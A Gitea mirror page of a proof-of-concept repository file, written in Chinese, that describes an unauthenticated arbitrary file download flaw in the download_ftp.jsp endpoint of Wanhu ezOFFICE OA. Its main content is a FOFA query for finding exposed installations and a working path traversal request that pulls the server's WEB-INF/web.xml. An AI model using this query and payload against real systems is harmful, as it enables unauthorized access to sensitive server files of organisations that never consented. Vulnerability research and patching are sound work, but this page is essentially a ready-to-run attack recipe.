admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 14:04:06 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/万户OA/万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

17 lines
504 B
Markdown
Raw Blame History

## 万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞
万户OA-ezOFFICE download_ftp.jsp 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
## fofa
```
app="万户网络-ezOFFICE"
```
## poc
```
/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
```
![image-20240618125057104](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406181250322.png)
Reference in New Issue View Git Blame Copy Permalink